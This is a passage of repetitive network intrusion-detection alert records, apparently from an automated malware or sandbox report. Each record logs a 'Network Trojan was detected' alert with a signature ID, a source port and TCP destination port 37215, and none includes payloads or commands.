          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.812812
          SID:2835222
          Source Port:46980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708465
          SID:2829579
          Source Port:53828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.152082
          SID:2829579
          Source Port:33028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.617499
          SID:2835222
          Source Port:56374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.283770
          SID:2835222
          Source Port:48700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339232
          SID:2835222
          Source Port:54496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.653022
          SID:2829579
          Source Port:35630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267384
          SID:2835222
          Source Port:45820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484942
          SID:2829579
          Source Port:37016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196766
          SID:2829579
          Source Port:46592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.244519
          SID:2835222
          Source Port:46952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.283674
          SID:2829579
          Source Port:52472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115780
          SID:2829579
          Source Port:59236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848400
          SID:2835222
          Source Port:42450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.285108
          SID:2835222
          Source Port:52078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846844
          SID:2829579
          Source Port:57728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.359280
          SID:2835222
          Source Port:39874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.098061
          SID:2829579
          Source Port:57546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.727526
          SID:2835222
          Source Port:47378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476505
          SID:2829579
          Source Port:42104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399219
          SID:2835222
          Source Port:38872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466479
          SID:2829579
          Source Port:59798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.631630
          SID:2829579
          Source Port:53776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537646
          SID:2835222
          Source Port:44324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.307177
          SID:2835222
          Source Port:49646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.985143
          SID:2835222
          Source Port:51718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.662680
          SID:2829579
          Source Port:49496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291575
          SID:2829579
          Source Port:58598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.341403
          SID:2835222
          Source Port:43036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669430
          SID:2829579
          Source Port:38630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939408
          SID:2835222
          Source Port:34166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.810531
          SID:2829579
          Source Port:39304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959712
          SID:2829579
          Source Port:55664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.610045
          SID:2835222
          Source Port:57904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.547743
          SID:2835222
          Source Port:38754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.710683
          SID:2829579
          Source Port:39664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.177420
          SID:2835222
          Source Port:37950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547288
          SID:2835222
          Source Port:34110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923313
          SID:2829579
          Source Port:46630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.136808
          SID:2829579
          Source Port:34116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.803867
          SID:2835222
          Source Port:42226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794220
          SID:2835222
          Source Port:36182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102292
          SID:2829579
          Source Port:37490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.483665
          SID:2829579
          Source Port:51876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594613
          SID:2829579
          Source Port:51658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039501
          SID:2829579
          Source Port:33206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.908051
          SID:2835222
          Source Port:35150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.918941
          SID:2835222
          Source Port:38712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322882
          SID:2835222
          Source Port:42118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.471172
          SID:2835222
          Source Port:44544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.610528
          SID:2835222
          Source Port:46146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.713510
          SID:2829579
          Source Port:58824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591201
          SID:2829579
          Source Port:53470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.598937
          SID:2835222
          Source Port:58988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.151234
          SID:2829579
          Source Port:53868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211294
          SID:2829579
          Source Port:35862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923114
          SID:2835222
          Source Port:37900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.403051
          SID:2829579
          Source Port:47238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.855867
          SID:2829579
          Source Port:43288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551118
          SID:2835222
          Source Port:53818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551190
          SID:2829579
          Source Port:33150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.655892
          SID:2829579
          Source Port:45744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146325
          SID:2835222
          Source Port:52988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.623211
          SID:2829579
          Source Port:37536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462515
          SID:2835222
          Source Port:34922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.657757
          SID:2835222
          Source Port:38972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.870816
          SID:2829579
          Source Port:42966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402459
          SID:2829579
          Source Port:50242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923098
          SID:2835222
          Source Port:53076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.039204
          SID:2829579
          Source Port:54500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.771641
          SID:2829579
          Source Port:55400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476812
          SID:2835222
          Source Port:48776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.145146
          SID:2835222
          Source Port:57584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794919
          SID:2835222
          Source Port:34814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178426
          SID:2829579
          Source Port:53012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.341831
          SID:2829579
          Source Port:39788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728513
          SID:2835222
          Source Port:58090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336927
          SID:2829579
          Source Port:59310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176000
          SID:2835222
          Source Port:43388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.683710
          SID:2835222
          Source Port:60648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.560891
          SID:2829579
          Source Port:37170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664645
          SID:2829579
          Source Port:39096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146276
          SID:2829579
          Source Port:47532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466556
          SID:2829579
          Source Port:59770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216382
          SID:2835222
          Source Port:34618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202093
          SID:2829579
          Source Port:35786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.962704
          SID:2829579
          Source Port:56096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214819
          SID:2829579
          Source Port:34538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161383
          SID:2835222
          Source Port:57996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.160342
          SID:2835222
          Source Port:52668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.683702
          SID:2835222
          Source Port:41134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.213627
          SID:2829579
          Source Port:37780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977376
          SID:2835222
          Source Port:40020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.186218
          SID:2829579
          Source Port:57536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.614799
          SID:2829579
          Source Port:54324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271581
          SID:2835222
          Source Port:45596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.147800
          SID:2835222
          Source Port:50948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048655
          SID:2835222
          Source Port:47716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.681186
          SID:2835222
          Source Port:60904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299236
          SID:2835222
          Source Port:43308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774855
          SID:2829579
          Source Port:52988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744729
          SID:2835222
          Source Port:55730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892808
          SID:2835222
          Source Port:35378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.975296
          SID:2835222
          Source Port:56786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.321173
          SID:2829579
          Source Port:39880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482487
          SID:2835222
          Source Port:38870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170408
          SID:2829579
          Source Port:52036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472075
          SID:2829579
          Source Port:38776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.008800
          SID:2829579
          Source Port:48164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474469
          SID:2829579
          Source Port:50122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.527096
          SID:2829579
          Source Port:41380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.062371
          SID:2829579
          Source Port:37062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322152
          SID:2829579
          Source Port:42736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.482127
          SID:2829579
          Source Port:57192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.352546
          SID:2829579
          Source Port:48484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941497
          SID:2835222
          Source Port:42168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.293871
          SID:2835222
          Source Port:40790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202980
          SID:2835222
          Source Port:48494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.858774
          SID:2835222
          Source Port:39880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298588
          SID:2835222
          Source Port:37066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.598928
          SID:2835222
          Source Port:43630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474467
          SID:2835222
          Source Port:51332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.403353
          SID:2829579
          Source Port:55920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216614
          SID:2835222
          Source Port:52730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208415
          SID:2829579
          Source Port:42038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.691972
          SID:2829579
          Source Port:39202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.197796
          SID:2829579
          Source Port:34150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.771068
          SID:2829579
          Source Port:57896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665889
          SID:2829579
          Source Port:44348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.817657
          SID:2829579
          Source Port:48006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336389
          SID:2829579
          Source Port:48568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.160063
          SID:2829579
          Source Port:49406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.287870
          SID:2835222
          Source Port:43010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.562568
          SID:2829579
          Source Port:57106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.989060
          SID:2835222
          Source Port:52808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.204754
          SID:2835222
          Source Port:51446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268547
          SID:2835222
          Source Port:33508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065986
          SID:2829579
          Source Port:43122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.229311
          SID:2835222
          Source Port:45758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.281492
          SID:2835222
          Source Port:53996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.963749
          SID:2835222
          Source Port:34182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.270784
          SID:2829579
          Source Port:38162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760558
          SID:2829579
          Source Port:56298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114305
          SID:2835222
          Source Port:47076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.207967
          SID:2829579
          Source Port:43104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339325
          SID:2835222
          Source Port:42882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299309
          SID:2829579
          Source Port:45706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.618575
          SID:2829579
          Source Port:59454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708259
          SID:2829579
          Source Port:40174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.987263
          SID:2829579
          Source Port:43378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.042047
          SID:2835222
          Source Port:58470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.470794
          SID:2835222
          Source Port:44178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.305906
          SID:2835222
          Source Port:42628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.498860
          SID:2835222
          Source Port:49446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401472
          SID:2835222
          Source Port:54614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.988638
          SID:2829579
          Source Port:39250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650238
          SID:2829579
          Source Port:59358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764618
          SID:2835222
          Source Port:58340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.808251
          SID:2835222
          Source Port:52336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.229557
          SID:2835222
          Source Port:60856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.815516
          SID:2835222
          Source Port:43542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528106
          SID:2835222
          Source Port:43910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651110
          SID:2835222
          Source Port:47788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.588811
          SID:2829579
          Source Port:44050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.669121
          SID:2835222
          Source Port:35368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.669514
          SID:2829579
          Source Port:59616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476387
          SID:2829579
          Source Port:42004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.814019
          SID:2829579
          Source Port:43808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741626
          SID:2835222
          Source Port:58404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.766708
          SID:2829579
          Source Port:59448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923279
          SID:2835222
          Source Port:53938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.429294
          SID:2829579
          Source Port:44442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528989
          SID:2835222
          Source Port:60654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.977106
          SID:2829579
          Source Port:36878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.113204
          SID:2835222
          Source Port:56018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210299
          SID:2829579
          Source Port:51320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.051050
          SID:2829579
          Source Port:33374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.424488
          SID:2835222
          Source Port:55088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.989791
          SID:2829579
          Source Port:36116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.041455
          SID:2835222
          Source Port:36998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.810411
          SID:2829579
          Source Port:48980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.305034
          SID:2835222
          Source Port:53004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.552056
          SID:2835222
          Source Port:58068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175975
          SID:2835222
          Source Port:52884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464244
          SID:2829579
          Source Port:54826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177116
          SID:2835222
          Source Port:39922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.965184
          SID:2829579
          Source Port:54786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.560515
          SID:2835222
          Source Port:58154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115429
          SID:2829579
          Source Port:34960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.267193
          SID:2829579
          Source Port:56386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.115920
          SID:2829579
          Source Port:38434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591112
          SID:2829579
          Source Port:43706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652484
          SID:2829579
          Source Port:57852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.732172
          SID:2835222
          Source Port:48876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.685456
          SID:2829579
          Source Port:55950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.854104
          SID:2835222
          Source Port:51092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.678125
          SID:2829579
          Source Port:36172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
